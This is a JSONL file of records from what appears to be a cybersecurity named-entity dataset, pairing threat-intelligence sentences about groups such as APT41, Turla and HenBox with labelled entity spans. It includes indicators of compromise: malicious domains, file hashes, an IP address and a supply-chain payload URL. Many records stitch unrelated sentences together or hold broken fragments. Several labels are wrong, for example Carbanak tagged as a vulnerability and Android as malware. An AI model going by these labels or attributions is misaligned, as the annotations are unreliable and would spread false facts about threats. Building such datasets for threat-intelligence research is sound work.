{"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[4, 28]], "THREAT_ACTOR: PUTTER PANDA": [[105, 117]], "ORGANIZATION: ESET": [[189, 193]], "MALWARE: Potao": [[207, 212]], "ORGANIZATION: government": [[275, 285]], "ORGANIZATION: military entities": [[290, 307]], "ORGANIZATION: news agencies": [[339, 352]]}, "info": {"id": "cyberner_stix_train_007592", "source": "cyberner_stix_train"}}
{"text": "A company involved in the design and manufacture of motor vehicles .", "spans": {"ORGANIZATION: A company involved in the design and manufacture of motor vehicles": [[0, 66]]}, "info": {"id": "cyberner_stix_train_007593", "source": "cyberner_stix_train"}}
{"text": "The number continues to rise at an additional 13,000 breached devices each day . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer ) Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: APT37": [[81, 86]], "THREAT_ACTOR: state-sponsored group": [[110, 131]], "ORGANIZATION: financial company": [[160, 177]], "TOOL: optinsn_t": [[227, 236]], "TOOL: ObfCompilerOptimizer": [[282, 302]], "ORGANIZATION: Talos": [[428, 433]], "ORGANIZATION: Open Babel": [[499, 509]]}, "info": {"id": "cyberner_stix_train_007594", "source": "cyberner_stix_train"}}
{"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis . OceanLotus : manongrover.com 7244 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"THREAT_ACTOR: threat actor": [[145, 157]], "THREAT_ACTOR: OceanLotus": [[445, 455]], "DOMAIN: manongrover.com": [[458, 473]], "THREAT_ACTOR: LockBit": [[512, 519]]}, "info": {"id": "cyberner_stix_train_007595", "source": "cyberner_stix_train"}}
{"text": "TA542 , the primary actor behind Emotet , is known for the development of lures and malicious mail specific to given regions . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched .", "spans": {"THREAT_ACTOR: TA542": [[0, 5]], "TOOL: Emotet": [[33, 39]], "MALWARE: Magnitude EK": [[131, 143]], "VULNERABILITY: CVE-2016-0189": [[170, 183]], "ORGANIZATION: FireEye": [[214, 221]], "MALWARE: Neutrino Exploit Kit": [[239, 259]]}, "info": {"id": "cyberner_stix_train_007596", "source": "cyberner_stix_train"}}
{"text": "Unit 42 believes this group is previously unidentified and therefore have we have dubbed it \" RANCOR \" . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: group": [[22, 27]], "THREAT_ACTOR: RANCOR": [[94, 100]], "FILEPATH: tool": [[109, 113]]}, "info": {"id": "cyberner_stix_train_007597", "source": "cyberner_stix_train"}}
{"text": "HIDDEN COBRA actors commonly target systems running older , unsupported versions of Microsoft operating systems .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[0, 12]], "ORGANIZATION: Microsoft": [[84, 93]]}, "info": {"id": "cyberner_stix_train_007598", "source": "cyberner_stix_train"}}
{"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting bank accounts . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims . ZxShell has been around since 2004 . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"MALWARE: Perkele": [[0, 7]], "MALWARE: Wroba": [[12, 17]], "THREAT_ACTOR: Turla": [[139, 144]], "TOOL: fake Flash installers": [[190, 211]], "MALWARE: ZxShell": [[236, 243]]}, "info": {"id": "cyberner_stix_train_007599", "source": "cyberner_stix_train"}}
{"text": "This sample displayed ads from various sources . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China . The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads . If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": {"ORGANIZATION: Unit 42": [[49, 56]], "ORGANIZATION: Foreign Ministry": [[133, 149]], "SYSTEM: Exchange Server": [[324, 339]]}, "info": {"id": "cyberner_stix_train_007600", "source": "cyberner_stix_train"}}
{"text": "Data acquired from mike.jar 's extraction modules is normally XORed and stored in a folder named .lost+found on the SD card . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly . Announcement about a new regulation regarding internet usage in Palestinian government institutions . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": {"ORGANIZATION: Palestinian government": [[323, 345]], "THREAT_ACTOR: Cl0p": [[363, 367]]}, "info": {"id": "cyberner_stix_train_007601", "source": "cyberner_stix_train"}}
{"text": "\" BLU said they had no security department when I emailed them . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": {"ORGANIZATION: BLU": [[2, 5]], "MALWARE: ITW": [[97, 100]], "MALWARE: RTF": [[260, 263]], "MALWARE: HomamDownloader": [[291, 306]], "FILEPATH: a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7": [[309, 373]]}, "info": {"id": "cyberner_stix_train_007602", "source": "cyberner_stix_train"}}
{"text": "SMS . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": {"MALWARE: Catchamas": [[6, 15]], "THREAT_ACTOR: Leafminer": [[154, 163]], "THREAT_ACTOR: actors": [[296, 302]]}, "info": {"id": "cyberner_stix_train_007603", "source": "cyberner_stix_train"}}
{"text": "The library is an older version of the “ DWN_DLL_MAIN.dll ” ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": {"FILEPATH: DWN_DLL_MAIN.dll": [[41, 57]], "FILEPATH: ce8b99df8642c065b6af43fde1f786a3": [[67, 99]]}, "info": {"id": "cyberner_stix_train_007604", "source": "cyberner_stix_train"}}
{"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 “ Agent Smith ” Timeline Early signs of activity from the actor behind “ Agent Smith ” can be traced back to January 2016 . Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters . After a few months of monitoring , we were able to identify around 200 unique Dexphot domains . Per Microsoft ’s blog , they have identified additional post - exploitation activities , including : • Compression of data for exfiltration via 7 - Zip . • Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": {"MALWARE: Agent Smith": [[48, 59]], "TOOL: Command-and-Control": [[218, 237]], "MALWARE: Dexphot": [[375, 382]], "ORGANIZATION: Microsoft ’s": [[397, 409]]}, "info": {"id": "cyberner_stix_train_007605", "source": "cyberner_stix_train"}}
{"text": "What made this particular case interesting was that instead of the usual dull PDF file , the decoy was a Flash video file , more specifically a Super Bowl advertisement from 2007 purporting to show monkeys at an office .", "spans": {"TOOL: PDF": [[78, 81]], "TOOL: Flash": [[105, 110]]}, "info": {"id": "cyberner_stix_train_007606", "source": "cyberner_stix_train"}}
{"text": "] net adminsysteminfo [ . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": {"THREAT_ACTOR: APT41": [[145, 150]], "ORGANIZATION: Mandiant": [[240, 248]], "THREAT_ACTOR: APT29": [[262, 267]], "MALWARE: POSHSPY": [[307, 314]]}, "info": {"id": "cyberner_stix_train_007607", "source": "cyberner_stix_train"}}
{"text": "What Does SimBad Do ? If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": {"MALWARE: SimBad": [[10, 16]], "VULNERABILITY: Carbanak": [[54, 62]], "VULNERABILITY: CVE-2013-3660": [[231, 244]], "ORGANIZATION: e-commerce organization": [[329, 352]]}, "info": {"id": "cyberner_stix_train_007608", "source": "cyberner_stix_train"}}
{"text": "These apps appear legitimate due to their app logo , UI appearance , and redirects to the carrier webpage -- all luring end users to believe it ’ s the original one . Xpert RAT reportedly first appeared in 2011 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": {"MALWARE: Xpert RAT": [[167, 176]], "THREAT_ACTOR: cyber actors": [[213, 225]], "ORGANIZATION: media": [[260, 265]], "ORGANIZATION: aerospace": [[268, 277]], "ORGANIZATION: financial": [[280, 289]], "ORGANIZATION: critical infrastructure sectors": [[296, 327]]}, "info": {"id": "cyberner_stix_train_007609", "source": "cyberner_stix_train"}}
{"text": "The CozyDuke activity continues one of the long-running trends of the Dukes operations , the use of multiple malware toolsets against a single target .", "spans": {"MALWARE: CozyDuke": [[4, 12]], "THREAT_ACTOR: Dukes": [[70, 75]]}, "info": {"id": "cyberner_stix_train_007610", "source": "cyberner_stix_train"}}
{"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "ORGANIZATION: governmental": [[37, 49]], "ORGANIZATION: embassies": [[90, 99]], "ORGANIZATION: aerospace": [[121, 130]], "ORGANIZATION: defence Industries": [[135, 153]], "ORGANIZATION: financial institutions": [[156, 178]], "ORGANIZATION: journalists": [[181, 192]], "ORGANIZATION: software developers": [[195, 214]], "FILEPATH: malware": [[221, 228]]}, "info": {"id": "cyberner_stix_train_007611", "source": "cyberner_stix_train"}}
{"text": "Furthermore , Dragos ’ analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: Dragos": [[14, 20]], "MALWARE: TRISIS": [[39, 45]]}, "info": {"id": "cyberner_stix_train_007612", "source": "cyberner_stix_train"}}
{"text": "The campaign appeared to consist of two distinct waves of spear-phishing , one during the first days of July and the other starting from the 20th of the month .", "spans": {}, "info": {"id": "cyberner_stix_train_007613", "source": "cyberner_stix_train"}}
{"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn ’ t . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent . The chain of evidence suggests that the threat actor ’s motives are financially driven .", "spans": {"THREAT_ACTOR: APT33": [[179, 184]], "MALWARE: malicious file": [[251, 265]], "ORGANIZATION: Kaspersky Lab": [[320, 333]], "FILEPATH: Trojan.Win32.Remexi": [[390, 409]], "FILEPATH: Trojan.Win32.Agent": [[414, 432]]}, "info": {"id": "cyberner_stix_train_007615", "source": "cyberner_stix_train"}}
{"text": "In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER” identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "MALWARE: ATM malware": [[46, 57]], "MALWARE: RIPPER": [[78, 84]], "ORGANIZATION: banks": [[258, 263]], "THREAT_ACTOR: Turla": [[285, 290]], "TOOL: emails": [[359, 365]], "ORGANIZATION: German Foreign Office staff": [[378, 405]]}, "info": {"id": "cyberner_stix_train_007616", "source": "cyberner_stix_train"}}
{"text": "The infection has not spread very widely at the time of writing , but we ’ ve seen that many users have already received its SMS content . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . A Glimpse into Glimpse For the second blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig S-APT/APT34 . Instead , it ’s likely that Royal is simply testing a new encryptor — especially considering that BlackSuit was used in just two attacks last month — and that this lull can be explained as more or less of a research period for them .", "spans": {"THREAT_ACTOR: admin@338": [[143, 152]], "TOOL: Poison Ivy RAT": [[170, 184]], "TOOL: WinHTTPHelper malware": [[189, 210]], "ORGANIZATION: government officials": [[242, 262]], "THREAT_ACTOR: Glimpse": [[280, 287]], "ORGANIZATION: IronNet Threat Research Team": [[332, 360]], "MALWARE: Glimpse": [[374, 381]], "TOOL: PowerShell": [[409, 419]], "THREAT_ACTOR: OilRig S-APT/APT34": [[449, 467]], "MALWARE: Royal": [[498, 503]], "TOOL: new encryptor": [[524, 537]], "MALWARE: BlackSuit": [[568, 577]]}, "info": {"id": "cyberner_stix_train_007617", "source": "cyberner_stix_train"}}
{"text": "Downeks.NET is obfuscated using “ Yano ” and can be easily de-obfuscated using the de4dot utility .", "spans": {"MALWARE: Downeks.NET": [[0, 11]], "TOOL: Yano": [[34, 38]], "TOOL: the de4dot utility": [[79, 97]]}, "info": {"id": "cyberner_stix_train_007618", "source": "cyberner_stix_train"}}
{"text": "Due to TG-3390 's determination , organizations should formulate a solid eviction plan before engaging with the threat actors to prevent them from reentering the network .", "spans": {"THREAT_ACTOR: TG-3390": [[7, 14]]}, "info": {"id": "cyberner_stix_train_007619", "source": "cyberner_stix_train"}}
{"text": "During our investigation of TEMP.Veles activity , we found multiple unique tools that the group deployed in the target environment .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]]}, "info": {"id": "cyberner_stix_train_007620", "source": "cyberner_stix_train"}}
{"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"TOOL: MuddyWater-associated samples": [[173, 202]], "TOOL: PowerShell commands": [[287, 306]], "THREAT_ACTOR: actor": [[378, 383]], "DOMAIN: connect.bafunpda.xyz": [[437, 457]]}, "info": {"id": "cyberner_stix_train_007621", "source": "cyberner_stix_train"}}
{"text": "This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server .", "spans": {"MALWARE: Zebrocy": [[25, 32]], "TOOL: JPEG": [[85, 89]], "TOOL: C2": [[103, 105]]}, "info": {"id": "cyberner_stix_train_007622", "source": "cyberner_stix_train"}}
{"text": "e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614 .", "spans": {"FILEPATH: e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614": [[0, 64]]}, "info": {"id": "cyberner_stix_train_007623", "source": "cyberner_stix_train"}}
{"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": {"THREAT_ACTOR: espionage": [[67, 76]], "ORGANIZATION: economic": [[81, 89]], "THREAT_ACTOR: activity groups": [[116, 131]], "ORGANIZATION: specific individuals": [[165, 185]], "ORGANIZATION: Dragos": [[188, 194]], "MALWARE: ICS vendors and manufacturers": [[229, 258]], "THREAT_ACTOR: XENOTIME": [[295, 303]], "MALWARE: ICS networks": [[414, 426]]}, "info": {"id": "cyberner_stix_train_007624", "source": "cyberner_stix_train"}}
{"text": "The longer a Trojan “ lives ” on a smartphone , the more money it will make for the owner . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . The decompiled function responsible for patching the parent process . In fact , they often drive one another to complete more complicated hacks .", "spans": {"ORGANIZATION: Dell SecureWorks": [[92, 108]], "THREAT_ACTOR: Group-3390": [[149, 159]]}, "info": {"id": "cyberner_stix_train_007625", "source": "cyberner_stix_train"}}
{"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": {"SYSTEM: Android": [[4, 11]], "ORGANIZATION: governments": [[256, 267]], "THREAT_ACTOR: ShadowHammer": [[270, 282]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[285, 379]]}, "info": {"id": "cyberner_stix_train_007626", "source": "cyberner_stix_train"}}
{"text": "Security experts have long warned of the ability of advanced adversaries to subvert hardware and software supply chains . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe . The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": {"MALWARE: SPK KANUN": [[139, 148]], "MALWARE: CiscoAny.exe": [[273, 285]]}, "info": {"id": "cyberner_stix_train_007627", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa.com .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "URL: ntg-sa.com": [[114, 124]]}, "info": {"id": "cyberner_stix_train_007628", "source": "cyberner_stix_train"}}
{"text": "This section describes some of the tools used by the group . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: group": [[53, 58]], "VULNERABILITY: exploit": [[119, 126]], "VULNERABILITY: CVE-2012-0158": [[127, 140]], "MALWARE: NetTraveler Trojan": [[156, 174]]}, "info": {"id": "cyberner_stix_train_007629", "source": "cyberner_stix_train"}}
{"text": "At least three of the messages were intended to check a user ’ s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia . Threat : Gamaredon Pteranodon implant SFX archive . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"MALWARE: RuMMS": [[316, 321]], "ORGANIZATION: Kaspersky": [[346, 355]], "THREAT_ACTOR: BlackOasis": [[379, 389]], "THREAT_ACTOR: Gamaredon": [[445, 454]], "MALWARE: Pteranodon": [[455, 465]], "TOOL: SFX archive": [[474, 485]], "MALWARE: COSMICENERGY": [[488, 500], [627, 639]], "ORGANIZATION: Russian Government": [[526, 544]]}, "info": {"id": "cyberner_stix_train_007630", "source": "cyberner_stix_train"}}
{"text": "Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON/TRISIS": [[278, 291]], "ORGANIZATION: Dragos": [[362, 368]], "ORGANIZATION: FireEye": [[453, 460]], "ORGANIZATION: media": [[520, 525]]}, "info": {"id": "cyberner_stix_train_007631", "source": "cyberner_stix_train"}}
{"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnet S-ACTs , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[31, 43]], "TOOL: DDoS botnet S-ACTs": [[59, 77]], "TOOL: keyloggers": [[80, 90]], "TOOL: remote access tools": [[93, 112]], "TOOL: RATs": [[115, 119]], "MALWARE: wiper": [[128, 133]]}, "info": {"id": "cyberner_stix_train_007632", "source": "cyberner_stix_train"}}
{"text": "Running Volatility 's vaddump plugin on this process allowed CTU researchers to obtain the Virtual Address Descriptor ( VAD ) sections .", "spans": {"TOOL: Volatility": [[8, 18]], "TOOL: vaddump": [[22, 29]], "TOOL: plugin": [[30, 36]], "ORGANIZATION: CTU": [[61, 64]], "TOOL: Virtual Address Descriptor": [[91, 117]], "TOOL: VAD": [[120, 123]]}, "info": {"id": "cyberner_stix_train_007633", "source": "cyberner_stix_train"}}
{"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware . Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Suckfly": [[20, 27]], "TOOL: hacktools": [[133, 142]], "ORGANIZATION: Group-IB": [[164, 172]], "THREAT_ACTOR: Silence’s": [[275, 284]], "MALWARE: Trojan": [[285, 291]], "MALWARE: Silence.MainModule": [[303, 321]]}, "info": {"id": "cyberner_stix_train_007634", "source": "cyberner_stix_train"}}
{"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . APT33 : 64.251.19.216 [REDACTED].myftp.org . Notably , there were no overlaps in infrastructure between these clusters of activity .", "spans": {"TOOL: WannaCry": [[115, 123]], "VULNERABILITY: EternalBlue": [[159, 170]], "THREAT_ACTOR: Shadow Brokers": [[200, 214]], "THREAT_ACTOR: APT33": [[236, 241]], "IP_ADDRESS: 64.251.19.216": [[244, 257]], "DOMAIN: [REDACTED].myftp.org": [[258, 278]]}, "info": {"id": "cyberner_stix_train_007635", "source": "cyberner_stix_train"}}
{"text": "The primary goal of sux appears to be steal messages and other data from popular messaging and social media apps specified within the HenBox sample . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"MALWARE: HenBox": [[134, 140]], "THREAT_ACTOR: APT41": [[157, 162], [326, 331]], "THREAT_ACTOR: Sofacy": [[382, 388]], "MALWARE: backdoors": [[409, 418]], "MALWARE: USB stealers": [[421, 433]], "MALWARE: Mimikatz": [[475, 483]]}, "info": {"id": "cyberner_stix_train_007636", "source": "cyberner_stix_train"}}
{"text": "Infrastructure While investigating HenBox we discovered infrastructure ties to other malware families associated with targeted attacks against Windows users – notable overlaps included PlugX , Zupdax , 9002 , and Poison Ivy . We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": {"MALWARE: HenBox": [[35, 41]], "SYSTEM: Windows": [[143, 150]], "MALWARE: PlugX": [[185, 190]], "MALWARE: Zupdax": [[193, 199]], "MALWARE: 9002": [[202, 206]], "MALWARE: Poison Ivy": [[213, 223]], "THREAT_ACTOR: APT41": [[238, 243]], "THREAT_ACTOR: Dukes": [[515, 520]], "MALWARE: MiniDuke": [[611, 619]], "MALWARE: CozyDuke": [[624, 632]]}, "info": {"id": "cyberner_stix_train_007637", "source": "cyberner_stix_train"}}
{"text": "The most common registrar used by the adversary is HiChina Zhicheng Technology Ltd .", "spans": {"ORGANIZATION: HiChina Zhicheng Technology Ltd": [[51, 82]]}, "info": {"id": "cyberner_stix_train_007638", "source": "cyberner_stix_train"}}
{"text": "Table 1 highlights some recent examples of this activity .", "spans": {}, "info": {"id": "cyberner_stix_train_007639", "source": "cyberner_stix_train"}}
{"text": "In the case of TA505 , while most elements of the framework are well-developed , their reliance on the Necurs botnet for the sending high-volume malicious spam - a key component of the Vector element above - appears to be their Achilles heel .", "spans": {"THREAT_ACTOR: TA505": [[15, 20]], "MALWARE: Necurs": [[103, 109]], "MALWARE: Achilles": [[228, 236]]}, "info": {"id": "cyberner_stix_train_007640", "source": "cyberner_stix_train"}}
{"text": "Consequently , the data and lastsize fields are mangled .", "spans": {}, "info": {"id": "cyberner_stix_train_007641", "source": "cyberner_stix_train"}}
{"text": "Conclusion Typically masquerading as legitimate Android system apps , and sometimes embedding legitimate apps within them , the primary goal of the malicious HenBox appears to be to spy on those who install them . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": {"MALWARE: Android": [[48, 55]], "MALWARE: HenBox": [[158, 164]], "THREAT_ACTOR: attacker": [[248, 256]], "TOOL: BalkanRAT": [[314, 323]], "THREAT_ACTOR: APT33": [[410, 415]], "ORGANIZATION: organization": [[435, 447]], "ORGANIZATION: aerospace sector": [[455, 471]], "ORGANIZATION: business conglomerate": [[487, 508]]}, "info": {"id": "cyberner_stix_train_007642", "source": "cyberner_stix_train"}}
{"text": "The jpg pulled from treestower.com displays a graphic picture of a dead man , which also appeared on a Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha .", "spans": {"DOMAIN: treestower.com": [[20, 34]], "ORGANIZATION: Hamas": [[152, 157]]}, "info": {"id": "cyberner_stix_train_007643", "source": "cyberner_stix_train"}}
{"text": "This could essentially allow for external devices to act as a trigger to execute the malicious HenBox code , or perhaps afford additional data HenBox can collect and exfiltrate . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"MALWARE: HenBox": [[95, 101], [143, 149]], "THREAT_ACTOR: APT41": [[245, 250]], "TOOL: variety of TTPs": [[263, 278]], "TOOL: Flash": [[427, 432]], "VULNERABILITY: exploits": [[433, 441]], "MALWARE: Carberp": [[459, 466]], "MALWARE: JHUHUGIT downloaders": [[473, 493]]}, "info": {"id": "cyberner_stix_train_007644", "source": "cyberner_stix_train"}}
{"text": "Symantec detects this threat as Backdoor.Nidiran .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Backdoor.Nidiran": [[32, 48]]}, "info": {"id": "cyberner_stix_train_007645", "source": "cyberner_stix_train"}}
{"text": "It allows threat actors to execute additional tools and perform post-intrusion actions on compromised systems .", "spans": {}, "info": {"id": "cyberner_stix_train_007646", "source": "cyberner_stix_train"}}
{"text": "All three files are required for the malware to run correctly .", "spans": {}, "info": {"id": "cyberner_stix_train_007647", "source": "cyberner_stix_train"}}
{"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": {"ORGANIZATION: healthcare": [[92, 102], [318, 328]], "ORGANIZATION: healthcare firms": [[189, 205]], "ORGANIZATION: IT organizations": [[208, 224]], "ORGANIZATION: medical clinics": [[258, 273]], "ORGANIZATION: logistical organizations": [[280, 304]], "MALWARE: legitimate Thai websites": [[370, 394]]}, "info": {"id": "cyberner_stix_train_007648", "source": "cyberner_stix_train"}}
{"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar .", "spans": {"ORGANIZATION: audiences": [[247, 256]], "MALWARE: DanderSpritz": [[259, 271]], "MALWARE: FuZZbuNch": [[340, 349]], "MALWARE: DisableSecurity": [[455, 470]], "MALWARE: EnableSecurity": [[475, 489]], "MALWARE: DarkPulsar": [[494, 504]]}, "info": {"id": "cyberner_stix_train_007649", "source": "cyberner_stix_train"}}
